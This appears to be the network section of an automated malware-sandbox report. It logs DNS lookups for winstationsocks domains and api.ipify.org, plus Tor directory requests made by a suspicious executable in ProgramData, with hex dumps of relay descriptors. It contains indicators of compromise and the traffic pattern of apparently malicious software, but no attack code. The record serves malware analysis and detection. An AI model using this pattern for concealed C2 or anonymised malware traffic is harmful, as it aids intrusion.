                      Feb 9, 2023 01:01:55.756973028 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.756989002 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.757008076 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.757014990 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:55.757633924 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.761080980 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.784190893 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:55.805455923 CET8049738131.188.40.189192.168.2.5
                      TimestampSource PortDest PortSource IPDest IP
                      Feb 9, 2023 00:59:56.504396915 CET6084153192.168.2.58.8.8.8
                      Feb 9, 2023 00:59:56.528392076 CET53608418.8.8.8192.168.2.5
                      Feb 9, 2023 00:59:56.537499905 CET6189353192.168.2.58.8.8.8
                      Feb 9, 2023 00:59:56.559506893 CET53618938.8.8.8192.168.2.5
                      Feb 9, 2023 00:59:56.603351116 CET6064953192.168.2.58.8.8.8
                      Feb 9, 2023 00:59:56.625726938 CET53606498.8.8.8192.168.2.5
                      Feb 9, 2023 01:01:52.755605936 CET6344653192.168.2.58.8.8.8
                      Feb 9, 2023 01:01:52.776331902 CET53634468.8.8.8192.168.2.5
                      Feb 9, 2023 01:01:52.821448088 CET5675153192.168.2.58.8.8.8
                      Feb 9, 2023 01:01:52.841624975 CET53567518.8.8.8192.168.2.5
                      Feb 9, 2023 01:01:53.173963070 CET5503953192.168.2.58.8.8.8
                      Feb 9, 2023 01:01:53.193766117 CET53550398.8.8.8192.168.2.5
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Feb 9, 2023 00:59:56.504396915 CET192.168.2.58.8.8.80x4474Standard query (0)winstationsocks.comA (IP address)IN (0x0001)false
                      Feb 9, 2023 00:59:56.537499905 CET192.168.2.58.8.8.80x3b32Standard query (0)winstationsocks.xyzA (IP address)IN (0x0001)false
                      Feb 9, 2023 00:59:56.603351116 CET192.168.2.58.8.8.80xcb39Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:52.755605936 CET192.168.2.58.8.8.80x895fStandard query (0)winstationsocks.comA (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:52.821448088 CET192.168.2.58.8.8.80x1483Standard query (0)winstationsocks.xyzA (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:53.173963070 CET192.168.2.58.8.8.80x6203Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Feb 9, 2023 00:59:56.528392076 CET8.8.8.8192.168.2.50x4474Name error (3)winstationsocks.comnonenoneA (IP address)IN (0x0001)false
                      Feb 9, 2023 00:59:56.559506893 CET8.8.8.8192.168.2.50x3b32Name error (3)winstationsocks.xyznonenoneA (IP address)IN (0x0001)false
                      Feb 9, 2023 00:59:56.625726938 CET8.8.8.8192.168.2.50xcb39No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                      Feb 9, 2023 00:59:56.625726938 CET8.8.8.8192.168.2.50xcb39No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                      Feb 9, 2023 00:59:56.625726938 CET8.8.8.8192.168.2.50xcb39No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                      Feb 9, 2023 00:59:56.625726938 CET8.8.8.8192.168.2.50xcb39No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:52.776331902 CET8.8.8.8192.168.2.50x895fName error (3)winstationsocks.comnonenoneA (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:52.841624975 CET8.8.8.8192.168.2.50x1483Name error (3)winstationsocks.xyznonenoneA (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:53.193766117 CET8.8.8.8192.168.2.50x6203No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                      Feb 9, 2023 01:01:53.193766117 CET8.8.8.8192.168.2.50x6203No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:53.193766117 CET8.8.8.8192.168.2.50x6203No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                      Feb 9, 2023 01:01:53.193766117 CET8.8.8.8192.168.2.50x6203No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                      • api.ipify.org
                      • 128.31.0.39
                      • 62.35.195.87
                      • 116.203.195.42
                      • 176.58.110.66
                      • 24.53.51.144
                      • 131.188.40.189
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.54969964.185.227.155443C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.549737173.231.16.76443C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.549712116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:35.140511036 CET2670OUTGET /tor/server/fp/0fb07690d64ce5c22b5175183c0e59678cdf7eab HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:35.171627998 CET2671INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:35 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:35 GMT
                      Data Raw: 72 6f 75 74 65 72 20 49 4e 53 52 65 6c 61 79 33 35 61 74 38 34 34 33 20 31 34 30 2e 37 38 2e 31 30 30 2e 33 35 20 38 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 76 61 41 62 78 72 38 6a 36 75 4b 35 43 76 49 61 4a 4b 4b 74 4c 4f 37 5a 6f 46 48 59 76 47 63 6e 68 6f 77 63 49 42 30 72 63 54 52 62 42 67 41 51 41 67 42 41 44 75 46 55 79 32 0a 75 45 7a 71 61 46 41 58 6e 51 67 6f 67 39 5a 76 71 41 54 53 6e 31 32 72 6b 77 2b 70 46 32 41 76 2f 72 47 65 75 59 47 41 78 79 7a 61 74 70 4a 59 68 4d 66 51 2f 33 74 4c 6a 37 31 57 71 31 6c 72 0a 49 6a 51 6d 6e 66 50 4c 72 4c 33 69 77 43 44 2b 4d 4b 70 73 56 2f 34 43 6b 72 31 39 37 58 33 35 30 41 67 4f 61 77 78 66 77 2b 70 6e 70 64 75 31 46 55 7a 2f 45 73 6e 2f 62 77 6f 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 37 68 56 4d 74 72 68 4d 36 6d 68 51 46 35 30 49 4b 49 50 57 62 36 67 45 30 70 39 64 71 35 4d 50 71 52 64 67 4c 2f 36 78 6e 72 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 31 3a 32 35 3a 31 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 46 42 30 20 37 36 39 30 20 44 36 34 43 20 45 35 43 32 20 32 42 35 31 20 37 35 31 38 20 33 43 30 45 20 35 39 36 37 20 38 43 44 46 20 37 45 41 42 0a 75 70 74 69 6d 65 20 31 39 34 34 36 33 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 35 32 30 20 31 30 37 33 37 34 31 38 32 34 20 36 34 32 34 35 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 31 43 36 39 42 46 33 30 42 30 45 34 43 35 44 30 34 41 31 44 30 41 46 44 33 31 46 37 30 31 39 30 32 37 33 37 44 38 32 20 32 75 78 43 66 70 53 55 4a 50 4c 62 59 67 63 43 31 79 63 48 4e 30 36 52 67 63 33 67 36 30 55 42 78 7a 56 4a 6c 69 55 37 4d 51 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 50 76 61 6f 56 75 54 4a 43 42 79 4a 79 66 39 2b 43 6a 4e 72 6e 46 55 78 4c 4f 6a 54 57 6d 62 52 77 31 70 67 31 30 78 55 65 35 50 70 4a 58 76 4f 2b 55 61 74 44 74 55 0a 32 68 54 4c 59 6c 59 58 49 76 50 69 58 6c 73 4e 35 38 54 59 58 30 55 68 6c 6c 72 51 66 32 34 48 52 65 68 41 45 41 6b 39 6c 67 57 69 38 72 64 49 55 30 36 74 39 7a 53 72 33 2b 42 5a 59 56 61 30 0a 34 4b 33 39 2b 69 41 71 36 66 44 7a 73 45 52 53 5a 33 54 37 37 36 52 59 48 34 50 46 31 4e 6f 77 4e 56 4e 55 30 50 33 73 59 70 37 7a 79 4e 74 79 59 39 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f
                      Data Ascii: router INSRelay35at8443 140.78.100.35 8443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxvaAbxr8j6uK5CvIaJKKtLO7ZoFHYvGcnhowcIB0rcTRbBgAQAgBADuFUy2uEzqaFAXnQgog9ZvqATSn12rkw+pF2Av/rGeuYGAxyzatpJYhMfQ/3tLj71Wq1lrIjQmnfPLrL3iwCD+MKpsV/4Ckr197X350AgOawxfw+pnpdu1FUz/Esn/bwo=-----END ED25519 CERT-----master-key-ed25519 7hVMtrhM6mhQF50IKIPWb6gE0p9dq5MPqRdgL/6xnrkplatform Tor 0.4.8.0-alpha-dev on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 11:25:17fingerprint 0FB0 7690 D64C E5C2 2B51 7518 3C0E 5967 8CDF 7EABuptime 194463bandwidth 107520 1073741824 6424576extra-info-digest F1C69BF30B0E4C5D04A1D0AFD31F701902737D82 2uxCfpSUJPLbYgcC1ycHN06Rgc3g60UBxzVJliU7MQMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAPvaoVuTJCByJyf9+CjNrnFUxLOjTWmbRw1pg10xUe5PpJXvO+UatDtU2hTLYlYXIvPiXlsN58TYX0UhllrQf24HRehAEAk9lgWi8rdIU06t9zSr3+BZYVa04K39+iAq6fDzsERSZ3T776RYH4PF1NowNVNU0P3sYp7zyNtyY9oxAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAo


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      11192.168.2.549713116.203.195.429030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:00:35.297224998 CET2677OUTGET /tor/server/fp/1f2077bf01caf23f819d4892a89883196aba842a HTTP/1.0
                      Host: 116.203.195.42
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:00:35.319740057 CET2678INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:00:35 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:00:35 GMT
                      Data Raw: 72 6f 75 74 65 72 20 70 6c 75 74 6f 61 20 33 37 2e 32 33 35 2e 34 38 2e 32 34 37 20 37 36 35 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 73 64 41 56 33 6c 31 4d 5a 62 72 34 67 4f 75 72 44 42 38 6e 6f 77 30 51 71 35 6a 75 45 6f 79 54 39 38 61 39 57 6d 4b 36 59 42 5a 63 73 4c 41 51 41 67 42 41 44 70 62 43 65 45 0a 74 38 34 65 76 48 35 5a 42 4e 5a 6e 52 6f 54 46 76 49 33 71 74 63 33 77 77 75 51 41 66 2f 65 33 65 59 4c 79 7a 44 4a 4f 4c 59 78 38 56 6d 70 54 6b 65 7a 6e 7a 46 31 76 77 63 51 45 54 75 6a 76 0a 66 36 6c 65 6a 79 59 74 32 66 31 71 59 50 48 46 55 59 67 72 2f 35 78 4e 37 38 62 6e 31 54 31 6b 58 50 68 71 33 39 37 33 2f 32 6f 4c 65 46 72 41 51 45 2f 65 46 6b 79 2f 38 77 63 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 36 57 77 6e 68 4c 66 4f 48 72 78 2b 57 51 54 57 5a 30 61 45 78 62 79 4e 36 72 58 4e 38 4d 4c 6b 41 48 2f 33 74 33 6d 43 38 73 77 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 33 3a 66 38 30 3a 34 38 3a 33 37 3a 32 33 35 3a 34 38 3a 32 34 37 3a 31 5d 3a 37 36 35 34 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 38 3a 30 39 3a 30 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 31 46 32 30 20 37 37 42 46 20 30 31 43 41 20 46 32 33 46 20 38 31 39 44 20 34 38 39 32 20 41 38 39 38 20 38 33 31 39 20 36 41 42 41 20 38 34 32 41 0a 75 70 74 69 6d 65 20 37 31 32 38 32 32 0a 62 61 6e 64 77 69 64 74 68 20 36 35 35 33 36 30 20 31 30 37 33 37 34 31 38 32 34 20 35 37 34 37 38 37 36 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 32 37 44 31 46 30 43 37 33 37 30 37 36 45 46 37 36 38 41 43 33 33 37 30 37 42 45 35 34 43 43 41 34 43 31 36 46 37 31 36 20 41 66 70 34 75 2b 49 49 36 6e 78 6c 34 45 53 37 77 72 4a 2f 55 6d 65 4d 39 4a 68 55 79 6e 49 46 68 46 57 31 43 68 68 36 33 37 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 30 66 4b 33 6c 41 51 36 2b 6b 4d 76 4c 53 43 4b 4a 4c 53 52 38 66 74 75 2f 44 31 66 49 68 4a 66 41 4c 6a 56 63 57 51 38 41 31 31 67 55 30 47 36 53 6f 46 39 38 6a 0a 5a 42 62 68 66 39 51 4e 39 39 72 74 41 48 58 6c 79 62 4a 49 74 64 4c 36 78 6b 42 53 34 48 76 5a 76 33 49 57 69 53 53 36 55 4f 78 77 52 64 69 37 72 54 4c 5a 48 63 64 31 59 62 50 49 47 63 4a 65 0a 76 41 6e 79 42 39 5a 5a 63 42 4d 78 57 57 65 50 63 4a 65 45 48 62 36 74 6f 6d 45 79 73 71 62 76 4b 51 43 4c 68 65 63 32 71 52 38 76 58 65 70 48 65 31 6a 62 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e
                      Data Ascii: router plutoa 37.235.48.247 7654 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxsdAV3l1MZbr4gOurDB8now0Qq5juEoyT98a9WmK6YBZcsLAQAgBADpbCeEt84evH5ZBNZnRoTFvI3qtc3wwuQAf/e3eYLyzDJOLYx8VmpTkeznzF1vwcQETujvf6lejyYt2f1qYPHFUYgr/5xN78bn1T1kXPhq3973/2oLeFrAQE/eFky/8wc=-----END ED25519 CERT-----master-key-ed25519 6WwnhLfOHrx+WQTWZ0aExbyN6rXN8MLkAH/3t3mC8swor-address [2a03:f80:48:37:235:48:247:1]:7654platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 18:09:06fingerprint 1F20 77BF 01CA F23F 819D 4892 A898 8319 6ABA 842Auptime 712822bandwidth 655360 1073741824 5747876extra-info-digest 27D1F0C737076EF768AC33707BE54CCA4C16F716 Afp4u+II6nxl4ES7wrJ/UmeM9JhUynIFhFW1Chh6378onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAK0fK3lAQ6+kMvLSCKJLSR8ftu/D1fIhJfALjVcWQ8A11gU0G6SoF98jZBbhf9QN99rtAHXlybJItdL6xkBS4HvZv3IWiSS6UOxwRdi7rTLZHcd1YbPIGcJevAnyB9ZZcBMxWWePcJeEHb6tomEysqbvKQCLhec2qR8vXepHe1jbAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.549719176.58.110.669030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:05.971638918 CET2719OUTGET /tor/server/fp/267ee437f0c28e8d0b5ddd5e0daeafc9bf0fe505 HTTP/1.0
                      Host: 176.58.110.66
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.54972224.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:16.520481110 CET2732OUTGET /tor/server/fp/7a72da3127be09a802255a600cd0b4e97785f5fd HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:16.814721107 CET2733INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:16 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:16 GMT
                      Data Raw: 72 6f 75 74 65 72 20 72 65 6c 61 79 6f 6e 31 31 37 33 20 31 38 35 2e 32 32 30 2e 31 30 31 2e 31 37 33 20 31 31 31 37 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 71 69 41 65 6d 66 33 75 62 51 54 33 38 38 76 52 30 4c 68 38 62 47 44 73 38 6e 63 76 54 30 46 78 39 34 66 66 62 31 67 6f 79 7a 39 5a 7a 73 41 51 41 67 42 41 43 4d 77 51 76 74 0a 33 6d 69 31 78 6c 73 65 4b 68 68 4d 35 77 43 4d 6f 52 4a 42 78 76 6f 48 65 76 70 4f 53 61 58 33 6e 71 2f 59 70 47 4e 78 75 56 33 44 79 41 76 67 30 57 73 35 41 5a 44 6f 77 52 69 5a 65 75 51 64 0a 37 6b 38 2b 6d 4b 36 6d 31 56 42 66 2f 7a 56 38 54 72 32 6b 58 5a 42 43 6c 4b 6b 57 54 4b 2f 63 33 6f 30 78 31 41 52 33 4d 51 52 68 2b 57 65 69 61 72 32 72 31 62 55 36 79 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 6a 4d 45 4c 37 64 35 6f 74 63 5a 62 48 69 6f 59 54 4f 63 41 6a 4b 45 53 51 63 62 36 42 33 72 36 54 6b 6d 6c 39 35 36 76 32 4b 51 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 62 3a 66 34 63 32 3a 31 3a 3a 31 37 33 5d 3a 31 31 31 37 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 33 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 33 2d 30 32 2d 30 38 20 31 37 3a 34 35 3a 34 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 41 37 32 20 44 41 33 31 20 32 37 42 45 20 30 39 41 38 20 30 32 32 35 20 35 41 36 30 20 30 43 44 30 20 42 34 45 39 20 37 37 38 35 20 46 35 46 44 0a 75 70 74 69 6d 65 20 31 30 38 30 31 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 35 35 30 34 33 38 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 30 32 39 37 44 37 30 43 36 37 35 34 39 37 36 38 30 39 46 30 39 34 41 30 33 36 45 30 45 37 42 44 33 30 45 43 30 45 45 46 20 34 57 4d 51 6e 34 76 62 42 4e 66 45 46 4f 39 31 32 31 53 79 33 56 6a 79 2b 6c 4a 7a 69 4b 32 6e 6c 6e 4d 67 67 2f 31 6a 77 74 38 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 7a 4f 31 34 63 76 52 5a 52 4f 32 49 4e 57 67 54 57 70 6a 52 42 4e 64 52 37 66 76 71 45 36 6e 56 50 6e 73 43 32 46 42 52 4f 34 38 70 2f 79 52 7a 68 66 4d 51 43 57 0a 5a 6f 64 2f 54 76 77 76 63 33 70 59 32 70 66 4f 42 75 6a 73 32 38 6c 4c 51 66 32 57 65 4b 31 32 74 46 6f 4a 46 75 73 4b 37 76 32 41 42 61 76 2b 6d 39 31 2b 49 51 61 6b 51 66 78 6c 41 64 4d 66 0a 77 74 62 42 42 70 64 4f 39 62 4e 71 2b 47 6c 69 73 55 7a 43 36 51 58 4d 62 38 6f 71 6f 46 33 77 45 2b 4f 50 76 70 59 56 47 2f 4b 56 55 4d 6f 7a 79 76 75 48 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                      Data Ascii: router relayon1173 185.220.101.173 11173 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxqiAemf3ubQT388vR0Lh8bGDs8ncvT0Fx94ffb1goyz9ZzsAQAgBACMwQvt3mi1xlseKhhM5wCMoRJBxvoHevpOSaX3nq/YpGNxuV3DyAvg0Ws5AZDowRiZeuQd7k8+mK6m1VBf/zV8Tr2kXZBClKkWTK/c3o0x1AR3MQRh+Weiar2r1bU6ygM=-----END ED25519 CERT-----master-key-ed25519 jMEL7d5otcZbHioYTOcAjKESQcb6B3r6Tkml956v2KQor-address [2a0b:f4c2:1::173]:11173platform Tor 0.4.7.13 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2023-02-08 17:45:48fingerprint 7A72 DA31 27BE 09A8 0225 5A60 0CD0 B4E9 7785 F5FDuptime 10801bandwidth 1073741824 1073741824 15504384extra-info-digest 0297D70C6754976809F094A036E0E7BD30EC0EEF 4WMQn4vbBNfEFO9121Sy3Vjy+lJziK2nlnMgg/1jwt8onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKzO14cvRZRO2INWgTWpjRBNdR7fvqE6nVPnsC2FBRO48p/yRzhfMQCWZod/Tvwvc3pY2pfOBujs28lLQf2WeK12tFoJFusK7v2ABav+m91+IQakQfxlAdMfwtbBBpdO9bNq+GlisUzC6QXMb8oqoF3wE+OPvpYVG/KVUMozyvuHAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      14192.168.2.54972324.53.51.1449030C:\ProgramData\dtkttiw\llfujo.exe
                      TimestampkBytes transferredDirectionData
                      Feb 9, 2023 01:01:17.073277950 CET2742OUTGET /tor/server/fp/5756d9c403d89b79afe69d50bb0682ba318319fb HTTP/1.0
                      Host: 24.53.51.144
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      Connection: close
                      Feb 9, 2023 01:01:17.857295990 CET2743INHTTP/1.0 200 OK
                      Date: Thu, 09 Feb 2023 00:01:17 GMT
                      Content-Type: text/plain
                      X-Your-Address-Is: 84.17.52.13
                      Content-Encoding: identity
                      Expires: Sat, 11 Feb 2023 00:01:17 GMT
                      Data Raw: 72 6f 75 74 65 72 20 51 75 65 74 7a 61 6c 63 6f 61 74 6c 20 31 38 38 2e 36 38 2e 35 38 2e 31 33 31 20 39 31 30 30 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 79 45 77 41 64 41 64 6e 38 71 70 6f 68 6d 34 48 78 45 41 35 33 52 2b 65 74 70 2b 68 69 43 6c 4d 36 43 65 67 66 55 39 65 49 48 2f 6e 68 47 49 41 51 41 67 42 41 41 79 4b 4b 38 68 0a 72 70 55 46 6a 43 58 33 56 58 70 6d 37 39 76 76 77 52 6f 51 44 41 39 6c 4c 54 36 47 5a 77 75 4a 36 49 75 70 33 33 59 37 6f 6d 58 70 79 66 6d 71 51 70 71 51 38 70 30 4d 35 5a 76 5a 45 33 66 4a 0a 35 41 63 74 7a 74 4a 79 36 4b 57 75 6c 43 35 52 45 43 38 6c 73 67 62 73 7a 39 4c 43 73 51 73 46 55 4b 33 32 74 66 41 62 